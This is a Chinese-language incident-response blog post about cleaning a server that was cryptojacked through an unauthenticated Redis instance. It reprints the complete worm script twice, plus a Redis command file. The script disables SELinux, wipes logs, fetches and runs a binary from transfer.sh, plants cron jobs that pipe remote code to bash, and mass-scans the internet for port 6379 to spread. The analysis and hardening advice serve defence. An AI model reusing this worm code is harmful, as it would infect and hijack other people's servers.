剛剛一關係不錯的朋友在群裡求助

向他要了服務器密碼後登上去看了眼，發現被挖礦了。。

結束掉這個進程後發現沒有死灰復燃，繼續查。

接著在root目錄下發現了大量的隱藏文件。。

查了下最近登陸和執行過的命令，沒發現異常，由於服務器有redis，猜測是redis爆破進來的，跟他核實了下，他竟然沒給redis加密碼。。。

XFTP連上後顯示隱藏文件，發現了幾個可疑的腳本，下載回本地後分析

先從文件名最怪的腳本看起

腳本內容如下：

sleep 1find . -maxdepth 1 -name ".mxff0" -type f -mmin +60 -delete[ -f .mxff0 ] && exit 0echo 0 > .mxff0trap "rm -rf .m* .cmd tmp.* .r .dat $0" EXITsetenforce 0 2>/dev/nullecho SELINUX=disabled > /etc/sysconfig/selinux 2>/dev/nullcrontab -r 2>/dev/nullrm -rf /var/spool/cron 2>/dev/nullgrep -q 8.8.8.8 /etc/resolv.conf || echo "nameserver 8.8.8.8" >> /etc/resolv.confrm -rf /tmp/* 2>/dev/nullrm -rf /var/tmp/* 2>/dev/nullrm -rf /etc/root.sh 2>/dev/nullsync && echo 3 > /proc/sys/vm/drop_cachescat < /etc/security/limits.conf* hard nofile 100000* soft nofile 100000root hard nofile 100000root soft nofile 100000* hard nproc 100000* soft nproc 100000root hard nproc 100000root soft nproc 100000EOFiptables -I INPUT 1 -p tcp --dport 6379 -j DROPiptables -I INPUT 1 -p tcp --dport 6379 -s 127.0.0.1 -j ACCEPTps xf | grep -v grep | grep "redis-server\|nicehash\|linuxs\|linuxl\|crawler.weibo\|243/44444\|cryptonight\|stratum\|gpg-daemon\|jobs.flu.cc\|nmap\|cranberry\|start.sh\|watch.sh\|krun.sh\|killTop.sh\|cpuminer\|/60009\|ssh_deny.sh\|clean.sh\|\./over\|mrx1\|redisscan\|ebscan\|redis-cli\|barad_agent\|\.sr0\|clay\|udevs\|\.sshd\|/tmp/init" | while read pid _; do kill -9 "$pid"; donerm -rf /tmp/* 2>/dev/nullrm -rf /var/tmp/* 2>/dev/nullecho 0 > /var/spool/mail/rootecho 0 > /var/log/wtmpecho 0 > /var/log/secureecho 0 > /root/.bash_historyYUM_PACKAGE_NAME="iptables gcc redis coreutils bash curl wget"DEB_PACKAGE_NAME="coreutils bash build-essential make gcc redis-server redis-tools redis iptables curl"if cat /etc/*release | grep -i CentOS; thenyum clean allyum install -y -q epel-releaseyum install -y -q $YUM_PACKAGE_NAMEelif cat /etc/*release | grep -qi Red; thenyum clean allyum install -y -q epel-releaseyum install -y -q $YUM_PACKAGE_NAMEelif cat /etc/*release | grep -qi Fedora; thenyum clean allyum install -y -q epel-releaseyum install -y -q $YUM_PACKAGE_NAMEelif cat /etc/*release | grep -qi Ubuntu; thenexport DEBIAN_FRONTEND=noninteractiverm -rf /var/lib/apt/lists/*apt-get update -q --fix-missingfor PACKAGE in $DEB_PACKAGE_NAME;do apt-get install -y -q $PACKAGE; doneelif cat /etc/*release | grep -qi Debian; thenexport DEBIAN_FRONTEND=noninteractiverm -rf /var/lib/apt/lists/*apt-get update --fix-missingfor PACKAGE in $DEB_PACKAGE_NAME;do apt-get install -y -q $PACKAGE; doneelif cat /etc/*release | grep -qi Mint; thenexport DEBIAN_FRONTEND=noninteractiverm -rf /var/lib/apt/lists/*apt-get update --fix-missingfor PACKAGE in $DEB_PACKAGE_NAME;do apt-get install -y -q $PACKAGE; doneelif cat /etc/*release | grep -qi Knoppix; thenexport DEBIAN_FRONTEND=noninteractiverm -rf /var/lib/apt/lists/*apt-get update --fix-missingfor PACKAGE in $DEB_PACKAGE_NAME;do apt-get install -y -q $PACKAGE; doneelseexit 1fisleep 1if ! ( [ -x /usr/local/bin/pnscan ] || [ -x /usr/bin/pnscan ] ); thencurl -kLs https://codeload.github.com/ptrrkssn/pnscan/tar.gz/v1.12 > .x112 || wget -q -O .x112 https://codeload.github.com/ptrrkssn/pnscan/tar.gz/v1.12sleep 1[ -f .x112 ] && tar xf .x112 && cd pnscan-1.12 && make lnx && make install && cd .. && rm -rf pnscan-1.12 .x112fitname=$( mktemp )OMURL=https://transfer.sh/ly9S0/tmp.5ErvacTPRmcurl -s $OMURL > $tname || wget -q -O $tname $OMURLNMURL=$( curl -s --upload-file $tname https://transfer.sh )mv $tname .gpg && chmod +x .gpg && ./.gpg && rm -rf .gpg[ -z "$NMURL" ] && NMURL=$OMURLncmd=$(basename $(mktemp))sed 's|'"$OMURL"'|'"$NMURL"'|g' < .cmd > $ncmdNSURL=$( curl -s --upload-file $ncmd https://transfer.sh )echo 'flushall' > .datecho 'config set dir /var/spool/cron' >> .datecho 'config set dbfilename root' >> .datecho 'set Backup1 "\t\n*/2 * * * * curl -s '${NSURL}' > .cmd && bash .cmd\n\t"' >> .datecho 'set Backup2 "\t\n*/5 * * * * wget -O .cmd '${NSURL}' && bash .cmd\n\t"' >> .datecho 'set Backup3 "\t\n*/10 * * * * lynx -source '${NSURL}' > .cmd && bash .cmd\n\t"' >> .datecho 'save' >> .datecho 'config set dir /var/spool/cron/crontabs' >> .datecho 'save' >> .datecho 'exit' >> .datpnx=pnscan[ -x /usr/local/bin/pnscan ] && pnx=/usr/local/bin/pnscan[ -x /usr/bin/pnscan ] && pnx=/usr/bin/pnscanfor x in $( seq 1 224 | sort -R ); dofor y in $( seq 0 255 | sort -R ); do$pnx -t512 -R '6f 73 3a 4c 69 6e 75 78' -W '2a 31 0d 0a 24 34 0d 0a 69 6e 66 6f 0d 0a' $x.$y.0.0/16 6379 > .r.$x.$y.oawk '/Linux/ {print $1, $3}' .r.$x.$y.o > .r.$x.$y.lwhile read -r h p; docat .dat | redis-cli -h $h -p $p --raw &done < .r.$x.$y.ldonedoneecho 0 > /var/spool/mail/root 2>/dev/nullecho 0 > /var/log/wtmp 2>/dev/nullecho 0 > /var/log/secure 2>/dev/nullecho 0 > /root/.bash_history 2>/dev/nullexit 0

這個腳本幹了這麼幾件事：

1. 檢測是否存在別的挖礦程序，有就結束並刪除

2. 設置dns服務器

3. 修改防火牆規則（由於服務器是centos7，該操作並沒有執行成功）

4. 結束redis等進程

5. 刪除日誌（坑爹呢？）

6. 下載安裝iptables等軟件

7. 下載pnscan（一款可以感染IOT設備的蠕蟲）

8. 下載https://transfer.sh/GQCHp/tmp.pZR8v8kihR 並重命名為.gpg然後運行，運行後再刪除自身

9. 設置定時任務

10. 用pnscan掃描全網6379端口設備

隨後執行了 netstat -antp 查看了網絡連接

嘗試結束掉pnscan發現會重啟進程，推測有進程守護

用命令ps -ef|grep pnscan查看pnscan路徑

進入到/usr/local/bin目錄後執行ls

發現了這個東西靜靜的躺在那

讓我們用rm -rf pnscan送他最後一程

最後一步清理戰場

由於/root目錄下有大量的.r.x命名比較規則的文件，直接調用正則刪除即可

附幾個root目錄下的腳本：

.cmd[與tmp.Nm1jfFNPap內容一樣]:

sleep 1find . -maxdepth 1 -name ".mxff0" -type f -mmin +60 -delete[ -f .mxff0 ] && exit 0echo 0 > .mxff0trap "rm -rf .m* .cmd tmp.* .r .dat $0" EXITsetenforce 0 2>/dev/nullecho SELINUX=disabled > /etc/sysconfig/selinux 2>/dev/nullcrontab -r 2>/dev/nullrm -rf /var/spool/cron 2>/dev/nullgrep -q 8.8.8.8 /etc/resolv.conf || echo "nameserver 8.8.8.8" >> /etc/resolv.confrm -rf /tmp/* 2>/dev/nullrm -rf /var/tmp/* 2>/dev/nullrm -rf /etc/root.sh 2>/dev/nullsync && echo 3 > /proc/sys/vm/drop_cachescat < /etc/security/limits.conf* hard nofile 100000* soft nofile 100000root hard nofile 100000root soft nofile 100000* hard nproc 100000* soft nproc 100000root hard nproc 100000root soft nproc 100000EOFiptables -I INPUT 1 -p tcp --dport 6379 -j DROPiptables -I INPUT 1 -p tcp --dport 6379 -s 127.0.0.1 -j ACCEPTps xf | grep -v grep | grep "redis-server\|nicehash\|linuxs\|linuxl\|crawler.weibo\|243/44444\|cryptonight\|stratum\|gpg-daemon\|jobs.flu.cc\|nmap\|cranberry\|start.sh\|watch.sh\|krun.sh\|killTop.sh\|cpuminer\|/60009\|ssh_deny.sh\|clean.sh\|\./over\|mrx1\|redisscan\|ebscan\|redis-cli\|barad_agent\|\.sr0\|clay\|udevs\|\.sshd\|/tmp/init" | while read pid _; do kill -9 "$pid"; donerm -rf /tmp/* 2>/dev/nullrm -rf /var/tmp/* 2>/dev/nullecho 0 > /var/spool/mail/rootecho 0 > /var/log/wtmpecho 0 > /var/log/secureecho 0 > /root/.bash_historyYUM_PACKAGE_NAME="iptables gcc redis coreutils bash curl wget"DEB_PACKAGE_NAME="coreutils bash build-essential make gcc redis-server redis-tools redis iptables curl"if cat /etc/*release | grep -i CentOS; thenyum clean allyum install -y -q epel-releaseyum install -y -q $YUM_PACKAGE_NAMEelif cat /etc/*release | grep -qi Red; thenyum clean allyum install -y -q epel-releaseyum install -y -q $YUM_PACKAGE_NAMEelif cat /etc/*release | grep -qi Fedora; thenyum clean allyum install -y -q epel-releaseyum install -y -q $YUM_PACKAGE_NAMEelif cat /etc/*release | grep -qi Ubuntu; thenexport DEBIAN_FRONTEND=noninteractiverm -rf /var/lib/apt/lists/*apt-get update -q --fix-missingfor PACKAGE in $DEB_PACKAGE_NAME;do apt-get install -y -q $PACKAGE; doneelif cat /etc/*release | grep -qi Debian; thenexport DEBIAN_FRONTEND=noninteractiverm -rf /var/lib/apt/lists/*apt-get update --fix-missingfor PACKAGE in $DEB_PACKAGE_NAME;do apt-get install -y -q $PACKAGE; doneelif cat /etc/*release | grep -qi Mint; thenexport DEBIAN_FRONTEND=noninteractiverm -rf /var/lib/apt/lists/*apt-get update --fix-missingfor PACKAGE in $DEB_PACKAGE_NAME;do apt-get install -y -q $PACKAGE; doneelif cat /etc/*release | grep -qi Knoppix; thenexport DEBIAN_FRONTEND=noninteractiverm -rf /var/lib/apt/lists/*apt-get update --fix-missingfor PACKAGE in $DEB_PACKAGE_NAME;do apt-get install -y -q $PACKAGE; doneelseexit 1fisleep 1if ! ( [ -x /usr/local/bin/pnscan ] || [ -x /usr/bin/pnscan ] ); thencurl -kLs https://codeload.github.com/ptrrkssn/pnscan/tar.gz/v1.12 > .x112 || wget -q -O .x112 https://codeload.github.com/ptrrkssn/pnscan/tar.gz/v1.12sleep 1[ -f .x112 ] && tar xf .x112 && cd pnscan-1.12 && make lnx && make install && cd .. && rm -rf pnscan-1.12 .x112fitname=$( mktemp )OMURL=https://transfer.sh/GQCHp/tmp.pZR8v8kihRcurl -s $OMURL > $tname || wget -q -O $tname $OMURLNMURL=$( curl -s --upload-file $tname https://transfer.sh )mv $tname .gpg && chmod +x .gpg && ./.gpg && rm -rf .gpg[ -z "$NMURL" ] && NMURL=$OMURLncmd=$(basename $(mktemp))sed 's|'"$OMURL"'|'"$NMURL"'|g' < .cmd > $ncmdNSURL=$( curl -s --upload-file $ncmd https://transfer.sh )echo 'flushall' > .datecho 'config set dir /var/spool/cron' >> .datecho 'config set dbfilename root' >> .datecho 'set Backup1 "\t\n*/2 * * * * curl -s '${NSURL}' > .cmd && bash .cmd\n\t"' >> .datecho 'set Backup2 "\t\n*/5 * * * * wget -O .cmd '${NSURL}' && bash .cmd\n\t"' >> .datecho 'set Backup3 "\t\n*/10 * * * * lynx -source '${NSURL}' > .cmd && bash .cmd\n\t"' >> .datecho 'save' >> .datecho 'config set dir /var/spool/cron/crontabs' >> .datecho 'save' >> .datecho 'exit' >> .datpnx=pnscan[ -x /usr/local/bin/pnscan ] && pnx=/usr/local/bin/pnscan[ -x /usr/bin/pnscan ] && pnx=/usr/bin/pnscanfor x in $( seq 1 224 | sort -R ); dofor y in $( seq 0 255 | sort -R ); do$pnx -t512 -R '6f 73 3a 4c 69 6e 75 78' -W '2a 31 0d 0a 24 34 0d 0a 69 6e 66 6f 0d 0a' $x.$y.0.0/16 6379 > .r.$x.$y.oawk '/Linux/ {print $1, $3}' .r.$x.$y.o > .r.$x.$y.lwhile read -r h p; docat .dat | redis-cli -h $h -p $p --raw &done < .r.$x.$y.ldonedoneecho 0 > /var/spool/mail/root 2>/dev/nullecho 0 > /var/log/wtmp 2>/dev/nullecho 0 > /var/log/secure 2>/dev/nullecho 0 > /root/.bash_history 2>/dev/nullexit 0

.dat[創建定時任務]

flushallconfig set dir /var/spool/cronconfig set dbfilename rootset Backup1 "\t\n*/2 * * * * curl -s https://transfer.sh/ZShKM/tmp.Nm1jfFNPap > .cmd && bash .cmd\n\t"set Backup2 "\t\n*/5 * * * * wget -O .cmd https://transfer.sh/ZShKM/tmp.Nm1jfFNPap && bash .cmd\n\t"set Backup3 "\t\n*/10 * * * * lynx -source https://transfer.sh/ZShKM/tmp.Nm1jfFNPap > .cmd && bash .cmd\n\t"saveconfig set dir /var/spool/cron/crontabssaveexit

加固建議：

1. 不要將Redis暴露在公網

2. 如確實需要，將Redis設置高強度密碼並通過白名單限制接入

3. 定期備份、審查服務器日誌

閱讀更多 信息安全搬運工 的文章

關鍵字: Bash NoSQL Debian